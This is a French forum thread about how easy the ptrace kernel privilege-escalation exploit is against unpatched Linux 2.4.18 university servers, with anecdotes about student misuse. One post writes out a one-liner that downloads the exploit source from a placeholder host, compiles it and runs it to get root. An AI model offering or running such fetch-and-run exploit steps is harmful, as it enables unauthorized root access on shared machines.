Reprise du message précédent :
le 2.4.18 Debian est patché ptrace (au moins et probablement les autres mais là vu la date, c'est pas gagné)

Oui, le 2.4.18-bf2.4 que tu installes maintenant. Mais pas le sien =) Il ya fort à parier que toutes les applications sont sujettes à des failles puisque non mises à jours. SSH compris (ya eu des failles ssh depuis 2 ans non ?)

pas sur pour les failles services ; par contre c'est clair que le kernel là c'est pas terrible ; c'est quelle fac  

 
tiens tu as accès à ces machines là aussi toi  
 
J'ai remarqué qu'il y avait une sonde qui trainait sur le réseau  
 
un ps donne :

 
J'ai pas snort mais là il surveille quoi ?

 
Disons qu'elle est très simple a exploiter et que c'est une faille kernel quoi, c'est pas dépendant d'autre chose
 
Une faille kernel simple à exploiter qui permet directement de passer root dès que tu as un compte user, pour une fac je trouve que c'est le plus critique

 
oui oui, je sais bien, mais il me semble qu'il y en a eu d'autres, même depuis, mais qu'on en a moins parlé
peut-être qu'elles n'étaient pas aussi grave en faite, mais c'est pourtant ce qu'il me semblait

 
Sur le kernel oui, avec le mapping de la mémoire il me semble, mais c'était bcp plus délicat à reproduire que ptrace, si tu cherches un exploit tout fait ( on sait tous que typiquement les étudiants cherchent ça sur le net et ne comprennent même pas comment ça fonctionne ), c'est très rapide pour ptrace, tandis que pour les 2 suivantes c'est très difficile il me semble de les reproduire, donc ça demande plus de compétences.
 
ptrace à partir du moment ou tu sais faire wget http://machintruc.com/ptrace.c ; gcc -o ptrace.c ptrace ; ./ptrace , tu peux passer root sur la machine

Oui Mais moi je fais gcc ptrace.c -o ptrace
Ca m'a pris 4 minutes entre le moment où j'ai commencé à chercher et le moment ou il etait compilé. Et encore je cherche jamais ce genre de truc, alors pour quelqu'un qui est habitué !

 
merde quelle nouille j'ai écrit nawak
 
bah voilà, ptrace c'est clairement l'exploit critique super simple à utiliser

nanan c'est bon ce que tu fais aussi huhu

 
nop, j'ai inversé le binaire et le .c

on a vu

Ca m'apprendra à lire en travers...

c'est clair que ce genre de faille, c'est la porte ouverte aux abus. Je me suis servi de ptrace sur un vieux serveur linux en 2.2.14 car on avait perdu le pass root et j'ai mis moins de 5 minutes pour trouver le sources sur le net et le compilé. APres deux essai, j'étais root et je pouvais changer le pass. Et ce genre de truc dans une fac, c'est la looze total car les étudiants, ce sont des reloos, n'est ce pas

C'est clair
 
Surtout ceux qui se la pètent "hacker" parce qu'ils ont recopié un bête bout de code trouvé sur le net pour passer root

aux admins de faire leur boulot aussi et puis tous les etudiants ne sont pas des mechants (moi par exemple) mais bon il suffit d'un suel

et vive les warlords on m'a bien sortit l'annee derniere: j'ai  la derniere build de windows xp elle dechire tout ou dans le genre : regarde regarde je peux acceder à tou mon disque depuis ici (ce boulet avait mis un server fp t en rw sur tout son disque dur)

 
Oui c'est vrai aussi, mais y'en a toujours 2 3 pour être comme ça, y'en a 10-20 qui le feront et se contenteront de juste regarder sans faire chier, et 1 ou 2 qui feront les cons avec ça.
 
Dans tous les cas c'est la loose

 
"it's not a bug, it's a feature" ©

 
Quand j'étais étudiant en 2000, dans les labos sous windows, c'était avec Backorifice 2K que les étudiants s'amusaient à faire planter les PC. J'en ai vu s'amuser à mettre les touches des vieux clavier IBM en ordre alphabétique. D'autres surfaient en plein cours sur des sites pornos explicites et ont changé les fonds d'écrans pour des femmes nues ou à faire une LAN de CS alors que c'est interdit. Bref, le genre d'étudiant... qui ne vont faire le cours que pour passer le temps et qui ne sont pas nécessairement pasionnés par l'informatique  
 

je connais ....

 
Il écoute le trafic sur le réseau local ... les alertes qu'il donne sont fonction des règles qu'on lui applique, là c juste une commande de démarrage

les règles sont en lecture pour tous, et en plus l'exploit ptrace n'y figure pas...